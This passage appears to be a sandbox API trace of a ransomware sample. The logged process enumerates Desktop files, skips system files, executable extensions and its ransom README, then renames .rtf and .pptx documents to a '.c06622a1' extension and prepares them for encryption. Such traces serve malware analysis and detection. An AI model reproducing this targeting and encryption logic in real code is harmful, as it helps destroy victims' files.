[0147.881] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0xde3663aa [0147.881] RtlComputeCrc32 (PartialCrc=0x63aa, Buffer=0x4790094, Length=0x80) returned 0x702c06a2 [0147.881] RtlComputeCrc32 (PartialCrc=0x6a2, Buffer=0x4790094, Length=0x80) returned 0x770dbf95 [0147.881] RtlComputeCrc32 (PartialCrc=0xbf95, Buffer=0x4790094, Length=0x80) returned 0xda92a25d [0147.881] RtlComputeCrc32 (PartialCrc=0xa25d, Buffer=0x4790094, Length=0x80) returned 0xb2605ecb [0147.881] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0147.881] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0147.881] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0147.881] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5640500, ftCreationTime.dwHighDateTime=0x1d5e2ab, ftLastAccessTime.dwLowDateTime=0x8e9280b0, ftLastAccessTime.dwHighDateTime=0x1d5dafb, ftLastWriteTime.dwLowDateTime=0x8e9280b0, ftLastWriteTime.dwHighDateTime=0x1d5dafb, nFileSizeHigh=0x0, nFileSizeLow=0x7b46, dwReserved0=0x0, dwReserved1=0x0, cFileName="FzPnIc.rtf", cAlternateFileName="")) returned 1 [0147.881] _wcsicmp (_Str1="FzPnIc.rtf", _Str2="README.c06622a1.TXT") returned -12 [0147.881] wcsstr (_Str="FzPnIc.rtf", _SubStr="README") returned 0x0 [0147.881] _wcsicmp (_Str1="autorun.inf", _Str2="FzPnIc.rtf") returned -5 [0147.881] wcslen (_String="autorun.inf") returned 0xb [0147.881] _wcsicmp (_Str1="boot.ini", _Str2="FzPnIc.rtf") returned -4 [0147.881] wcslen (_String="boot.ini") returned 0x8 [0147.881] _wcsicmp (_Str1="bootfont.bin", _Str2="FzPnIc.rtf") returned -4 [0147.881] wcslen (_String="bootfont.bin") returned 0xc [0147.881] _wcsicmp (_Str1="bootsect.bak", _Str2="FzPnIc.rtf") returned -4 [0147.881] wcslen (_String="bootsect.bak") returned 0xc [0147.881] _wcsicmp (_Str1="desktop.ini", _Str2="FzPnIc.rtf") returned -2 [0147.881] wcslen (_String="desktop.ini") returned 0xb [0147.881] _wcsicmp (_Str1="iconcache.db", _Str2="FzPnIc.rtf") returned 3 [0147.881] wcslen (_String="iconcache.db") returned 0xc [0147.881] _wcsicmp (_Str1="ntldr", _Str2="FzPnIc.rtf") returned 8 [0147.881] wcslen (_String="ntldr") returned 0x5 [0147.881] _wcsicmp (_Str1="ntuser.dat", _Str2="FzPnIc.rtf") returned 8 [0147.881] wcslen (_String="ntuser.dat") returned 0xa [0147.882] _wcsicmp (_Str1="ntuser.dat.log", _Str2="FzPnIc.rtf") returned 8 [0147.882] wcslen (_String="ntuser.dat.log") returned 0xe [0147.882] _wcsicmp (_Str1="ntuser.ini", _Str2="FzPnIc.rtf") returned 8 [0147.882] wcslen (_String="ntuser.ini") returned 0xa [0147.882] _wcsicmp (_Str1="thumbs.db", _Str2="FzPnIc.rtf") returned 14 [0147.882] wcslen (_String="thumbs.db") returned 0x9 [0147.882] _wcsicmp (_Str1="386", _Str2="rtf") returned -63 [0147.882] wcslen (_String="386") returned 0x3 [0147.882] _wcsicmp (_Str1="adv", _Str2="rtf") returned -17 [0147.882] wcslen (_String="adv") returned 0x3 [0147.882] _wcsicmp (_Str1="ani", _Str2="rtf") returned -17 [0147.882] wcslen (_String="ani") returned 0x3 [0147.882] _wcsicmp (_Str1="bat", _Str2="rtf") returned -16 [0147.882] wcslen (_String="bat") returned 0x3 [0147.882] _wcsicmp (_Str1="bin", _Str2="rtf") returned -16 [0147.882] wcslen (_String="bin") returned 0x3 [0147.882] _wcsicmp (_Str1="cab", _Str2="rtf") returned -15 [0147.882] wcslen (_String="cab") returned 0x3 [0147.882] _wcsicmp (_Str1="cmd", _Str2="rtf") returned -15 [0147.882] wcslen (_String="cmd") returned 0x3 [0147.882] _wcsicmp (_Str1="com", _Str2="rtf") returned -15 [0147.882] wcslen (_String="com") returned 0x3 [0147.882] _wcsicmp (_Str1="cpl", _Str2="rtf") returned -15 [0147.882] wcslen (_String="cpl") returned 0x3 [0147.882] _wcsicmp (_Str1="cur", _Str2="rtf") returned -15 [0147.882] wcslen (_String="cur") returned 0x3 [0147.882] _wcsicmp (_Str1="deskthemepack", _Str2="rtf") returned -14 [0147.882] wcslen (_String="deskthemepack") returned 0xd [0147.882] _wcsicmp (_Str1="diagcab", _Str2="rtf") returned -14 [0147.882] wcslen (_String="diagcab") returned 0x7 [0147.882] _wcsicmp (_Str1="diagcfg", _Str2="rtf") returned -14 [0147.882] wcslen (_String="diagcfg") returned 0x7 [0147.882] _wcsicmp (_Str1="diagpkg", _Str2="rtf") returned -14 [0147.882] wcslen (_String="diagpkg") returned 0x7 [0147.882] _wcsicmp (_Str1="dll", _Str2="rtf") returned -14 [0147.882] wcslen (_String="dll") returned 0x3 [0147.882] _wcsicmp (_Str1="drv", _Str2="rtf") returned -14 [0147.883] wcslen (_String="drv") returned 0x3 [0147.883] _wcsicmp (_Str1="exe", _Str2="rtf") returned -13 [0147.883] wcslen (_String="exe") returned 0x3 [0147.883] _wcsicmp (_Str1="hlp", _Str2="rtf") returned -10 [0147.883] wcslen (_String="hlp") returned 0x3 [0147.883] _wcsicmp (_Str1="icl", _Str2="rtf") returned -9 [0147.883] wcslen (_String="icl") returned 0x3 [0147.883] _wcsicmp (_Str1="icns", _Str2="rtf") returned -9 [0147.883] wcslen (_String="icns") returned 0x4 [0147.883] _wcsicmp (_Str1="ico", _Str2="rtf") returned -9 [0147.883] wcslen (_String="ico") returned 0x3 [0147.883] _wcsicmp (_Str1="ics", _Str2="rtf") returned -9 [0147.883] wcslen (_String="ics") returned 0x3 [0147.883] _wcsicmp (_Str1="idx", _Str2="rtf") returned -9 [0147.883] wcslen (_String="idx") returned 0x3 [0147.883] _wcsicmp (_Str1="ldf", _Str2="rtf") returned -6 [0147.883] wcslen (_String="ldf") returned 0x3 [0147.883] _wcsicmp (_Str1="lnk", _Str2="rtf") returned -6 [0147.883] wcslen (_String="lnk") returned 0x3 [0147.883] _wcsicmp (_Str1="mod", _Str2="rtf") returned -5 [0147.883] wcslen (_String="mod") returned 0x3 [0147.883] _wcsicmp (_Str1="mpa", _Str2="rtf") returned -5 [0147.883] wcslen (_String="mpa") returned 0x3 [0147.883] _wcsicmp (_Str1="msc", _Str2="rtf") returned -5 [0147.883] wcslen (_String="msc") returned 0x3 [0147.883] _wcsicmp (_Str1="msp", _Str2="rtf") returned -5 [0147.883] wcslen (_String="msp") returned 0x3 [0147.883] _wcsicmp (_Str1="msstyles", _Str2="rtf") returned -5 [0147.883] wcslen (_String="msstyles") returned 0x8 [0147.883] _wcsicmp (_Str1="msu", _Str2="rtf") returned -5 [0147.883] wcslen (_String="msu") returned 0x3 [0147.883] _wcsicmp (_Str1="nls", _Str2="rtf") returned -4 [0147.883] wcslen (_String="nls") returned 0x3 [0147.883] _wcsicmp (_Str1="nomedia", _Str2="rtf") returned -4 [0147.883] wcslen (_String="nomedia") returned 0x7 [0147.883] _wcsicmp (_Str1="ocx", _Str2="rtf") returned -3 [0147.883] wcslen (_String="ocx") returned 0x3 [0147.883] _wcsicmp (_Str1="prf", _Str2="rtf") returned -2 [0147.884] wcslen (_String="prf") returned 0x3 [0147.884] _wcsicmp (_Str1="ps1", _Str2="rtf") returned -2 [0147.884] wcslen (_String="ps1") returned 0x3 [0147.884] _wcsicmp (_Str1="rom", _Str2="rtf") returned -5 [0147.884] wcslen (_String="rom") returned 0x3 [0147.884] _wcsicmp (_Str1="rtp", _Str2="rtf") returned 10 [0147.884] wcslen (_String="rtp") returned 0x3 [0147.884] _wcsicmp (_Str1="scr", _Str2="rtf") returned 1 [0147.884] wcslen (_String="scr") returned 0x3 [0147.884] _wcsicmp (_Str1="shs", _Str2="rtf") returned 1 [0147.884] wcslen (_String="shs") returned 0x3 [0147.884] _wcsicmp (_Str1="spl", _Str2="rtf") returned 1 [0147.884] wcslen (_String="spl") returned 0x3 [0147.884] _wcsicmp (_Str1="sys", _Str2="rtf") returned 1 [0147.884] wcslen (_String="sys") returned 0x3 [0147.884] _wcsicmp (_Str1="theme", _Str2="rtf") returned 2 [0147.884] wcslen (_String="theme") returned 0x5 [0147.884] _wcsicmp (_Str1="themepack", _Str2="rtf") returned 2 [0147.884] wcslen (_String="themepack") returned 0x9 [0147.884] _wcsicmp (_Str1="wpx", _Str2="rtf") returned 5 [0147.884] wcslen (_String="wpx") returned 0x3 [0147.884] _wcsicmp (_Str1="lock", _Str2="rtf") returned -6 [0147.884] wcslen (_String="lock") returned 0x4 [0147.884] _wcsicmp (_Str1="key", _Str2="rtf") returned -7 [0147.884] wcslen (_String="key") returned 0x3 [0147.884] _wcsicmp (_Str1="hta", _Str2="rtf") returned -10 [0147.884] wcslen (_String="hta") returned 0x3 [0147.884] _wcsicmp (_Str1="msi", _Str2="rtf") returned -5 [0147.884] wcslen (_String="msi") returned 0x3 [0147.884] _wcsicmp (_Str1="pdb", _Str2="rtf") returned -2 [0147.884] wcslen (_String="pdb") returned 0x3 [0147.884] _wcsicmp (_Str1="sql", _Str2="rtf") returned 1 [0147.884] wcslen (_String="sql") returned 0x3 [0147.884] _wcsicmp (_Str1="sqlite", _Str2="rtf") returned 1 [0147.884] wcslen (_String="sqlite") returned 0x6 [0147.884] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue")) returned 0x10 [0147.885] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0147.885] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" [0147.885] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned 0x30 [0147.885] wcscpy (in: _Dest=0x45000f2, _Source="FzPnIc.rtf" | out: _Dest="FzPnIc.rtf") returned="FzPnIc.rtf" [0147.885] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf", dwFileAttributes=0x80) returned 1 [0147.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\fzpnic.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0147.885] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.885] ReadFile (in: hFile=0x648, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0147.886] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xddc88d40 [0147.886] RtlComputeCrc32 (PartialCrc=0x8d40, Buffer=0x3fe8f4, Length=0x80) returned 0xe63ad779 [0147.886] RtlComputeCrc32 (PartialCrc=0xd779, Buffer=0x3fe8f4, Length=0x80) returned 0x6be4863c [0147.886] RtlComputeCrc32 (PartialCrc=0x863c, Buffer=0x3fe8f4, Length=0x80) returned 0xb774d11b [0147.886] RtlComputeCrc32 (PartialCrc=0xd11b, Buffer=0x3fe8f4, Length=0x80) returned 0xe1be06dc [0147.886] CloseHandle (hObject=0x648) returned 1 [0147.886] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0147.886] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf" [0147.886] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf") returned 0x3b [0147.886] wcscpy (in: _Dest=0x451010e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.886] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\fzpnic.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\fzpnic.rtf.c06622a1"), dwFlags=0x8) returned 1 [0147.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\FzPnIc.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\fzpnic.rtf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0147.888] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.889] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x693a98fe [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x183415b4 [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65498c67 [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65d06178 [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a72a8b8 [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2303a35a [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5622fa0d [0147.894] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d17ef0c [0147.897] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0x3e324b04 [0147.897] RtlComputeCrc32 (PartialCrc=0x4b04, Buffer=0x4820094, Length=0x80) returned 0x1103d99b [0147.897] RtlComputeCrc32 (PartialCrc=0xd99b, Buffer=0x4820094, Length=0x80) returned 0xa78b2993 [0147.897] RtlComputeCrc32 (PartialCrc=0x2993, Buffer=0x4820094, Length=0x80) returned 0xbf5cffc1 [0147.897] RtlComputeCrc32 (PartialCrc=0xffc1, Buffer=0x4820094, Length=0x80) returned 0xcf5a20c1 [0147.897] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0147.897] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0147.897] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0147.897] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6baec60, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd6baec60, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6baec60, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0147.897] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0147.897] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.897] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0147.897] _wcsicmp (_Str1="backup", _Str2="h-Hlue") returned -6 [0147.897] wcslen (_String="backup") returned 0x6 [0147.897] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.897] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.897] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaee91d0, ftCreationTime.dwHighDateTime=0x1d5d9b6, ftLastAccessTime.dwLowDateTime=0xc8b2e770, ftLastAccessTime.dwHighDateTime=0x1d5d8d1, ftLastWriteTime.dwLowDateTime=0xc8b2e770, ftLastWriteTime.dwHighDateTime=0x1d5d8d1, nFileSizeHigh=0x0, nFileSizeLow=0xa9b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="H1ASIo.pptx", cAlternateFileName="H1ASIO~1.PPT")) returned 1 [0147.897] _wcsicmp (_Str1="H1ASIo.pptx", _Str2="README.c06622a1.TXT") returned -10 [0147.898] wcsstr (_Str="H1ASIo.pptx", _SubStr="README") returned 0x0 [0147.898] _wcsicmp (_Str1="autorun.inf", _Str2="H1ASIo.pptx") returned -7 [0147.898] wcslen (_String="autorun.inf") returned 0xb [0147.898] _wcsicmp (_Str1="boot.ini", _Str2="H1ASIo.pptx") returned -6 [0147.898] wcslen (_String="boot.ini") returned 0x8 [0147.898] _wcsicmp (_Str1="bootfont.bin", _Str2="H1ASIo.pptx") returned -6 [0147.898] wcslen (_String="bootfont.bin") returned 0xc [0147.898] _wcsicmp (_Str1="bootsect.bak", _Str2="H1ASIo.pptx") returned -6 [0147.898] wcslen (_String="bootsect.bak") returned 0xc [0147.898] _wcsicmp (_Str1="desktop.ini", _Str2="H1ASIo.pptx") returned -4 [0147.898] wcslen (_String="desktop.ini") returned 0xb [0147.898] _wcsicmp (_Str1="iconcache.db", _Str2="H1ASIo.pptx") returned 1 [0147.898] wcslen (_String="iconcache.db") returned 0xc [0147.898] _wcsicmp (_Str1="ntldr", _Str2="H1ASIo.pptx") returned 6 [0147.898] wcslen (_String="ntldr") returned 0x5 [0147.898] _wcsicmp (_Str1="ntuser.dat", _Str2="H1ASIo.pptx") returned 6 [0147.898] wcslen (_String="ntuser.dat") returned 0xa [0147.898] _wcsicmp (_Str1="ntuser.dat.log", _Str2="H1ASIo.pptx") returned 6 [0147.898] wcslen (_String="ntuser.dat.log") returned 0xe [0147.898] _wcsicmp (_Str1="ntuser.ini", _Str2="H1ASIo.pptx") returned 6 [0147.898] wcslen (_String="ntuser.ini") returned 0xa [0147.898] _wcsicmp (_Str1="thumbs.db", _Str2="H1ASIo.pptx") returned 12 [0147.898] wcslen (_String="thumbs.db") returned 0x9 [0147.898] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0147.898] wcslen (_String="386") returned 0x3 [0147.898] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0147.898] wcslen (_String="adv") returned 0x3 [0147.898] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0147.898] wcslen (_String="ani") returned 0x3 [0147.898] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0147.898] wcslen (_String="bat") returned 0x3 [0147.898] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0147.898] wcslen (_String="bin") returned 0x3 [0147.898] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0147.898] wcslen (_String="cab") returned 0x3 [0147.898] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0147.898] wcslen (_String="cmd") returned 0x3 [0147.899] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0147.899] wcslen (_String="com") returned 0x3 [0147.899] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0147.899] wcslen (_String="cpl") returned 0x3 [0147.899] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0147.899] wcslen (_String="cur") returned 0x3 [0147.899] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0147.899] wcslen (_String="deskthemepack") returned 0xd [0147.899] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0147.899] wcslen (_String="diagcab") returned 0x7 [0147.899] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0147.899] wcslen (_String="diagcfg") returned 0x7 [0147.899] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0147.899] wcslen (_String="diagpkg") returned 0x7 [0147.899] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0147.899] wcslen (_String="dll") returned 0x3 [0147.899] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0147.899] wcslen (_String="drv") returned 0x3 [0147.899] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0147.899] wcslen (_String="exe") returned 0x3 [0147.899] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0147.899] wcslen (_String="hlp") returned 0x3 [0147.899] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0147.899] wcslen (_String="icl") returned 0x3 [0147.899] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0147.899] wcslen (_String="icns") returned 0x4 [0147.899] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0147.899] wcslen (_String="ico") returned 0x3 [0147.899] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0147.899] wcslen (_String="ics") returned 0x3 [0147.899] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0147.899] wcslen (_String="idx") returned 0x3 [0147.899] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0147.899] wcslen (_String="ldf") returned 0x3 [0147.899] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0147.899] wcslen (_String="lnk") returned 0x3 [0147.899] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0147.899] wcslen (_String="mod") returned 0x3 [0147.900] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0147.900] wcslen (_String="mpa") returned 0x3 [0147.900] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0147.900] wcslen (_String="msc") returned 0x3 [0147.900] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0147.900] wcslen (_String="msp") returned 0x3 [0147.900] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0147.900] wcslen (_String="msstyles") returned 0x8 [0147.900] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0147.900] wcslen (_String="msu") returned 0x3 [0147.900] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0147.900] wcslen (_String="nls") returned 0x3 [0147.900] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0147.900] wcslen (_String="nomedia") returned 0x7 [0147.900] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0147.900] wcslen (_String="ocx") returned 0x3 [0147.900] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0147.900] wcslen (_String="prf") returned 0x3 [0147.900] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0147.900] wcslen (_String="ps1") returned 0x3 [0147.900] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0147.900] wcslen (_String="rom") returned 0x3 [0147.900] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0147.900] wcslen (_String="rtp") returned 0x3 [0147.900] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0147.900] wcslen (_String="scr") returned 0x3 [0147.900] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0147.900] wcslen (_String="shs") returned 0x3 [0147.900] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0147.900] wcslen (_String="spl") returned 0x3 [0147.900] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0147.900] wcslen (_String="sys") returned 0x3 [0147.900] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0147.900] wcslen (_String="theme") returned 0x5 [0147.900] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0147.900] wcslen (_String="themepack") returned 0x9 [0147.900] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0147.901] wcslen (_String="wpx") returned 0x3 [0147.901] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0147.901] wcslen (_String="lock") returned 0x4 [0147.901] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0147.901] wcslen (_String="key") returned 0x3 [0147.901] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0147.901] wcslen (_String="hta") returned 0x3 [0147.901] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0147.901] wcslen (_String="msi") returned 0x3 [0147.901] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0147.901] wcslen (_String="pdb") returned 0x3 [0147.901] _wcsicmp (_Str1="sql", _Str2="pptx") returned 3 [0147.901] wcslen (_String="sql") returned 0x3 [0147.901] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0147.901] wcslen (_String="sqlite") returned 0x6 [0147.901] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.901] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.901] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.901] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.901] wcscpy (in: _Dest=0x44d00cc, _Source="H1ASIo.pptx" | out: _Dest="H1ASIo.pptx") returned="H1ASIo.pptx" [0147.901] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx", dwFileAttributes=0x80) returned 1 [0147.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1asio.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0147.901] SetFilePointerEx (in: hFile=0x624, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.902] ReadFile (in: hFile=0x624, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.903] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x1f65f848 [0147.903] RtlComputeCrc32 (PartialCrc=0xf848, Buffer=0x3feb74, Length=0x80) returned 0x16b311b8 [0147.903] RtlComputeCrc32 (PartialCrc=0x11b8, Buffer=0x3feb74, Length=0x80) returned 0x7ecf499c [0147.903] RtlComputeCrc32 (PartialCrc=0x499c, Buffer=0x3feb74, Length=0x80) returned 0xcaf0d594 [0147.903] RtlComputeCrc32 (PartialCrc=0xd594, Buffer=0x3feb74, Length=0x80) returned 0xf09c94cb [0147.903] CloseHandle (hObject=0x624) returned 1 [0147.903] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, 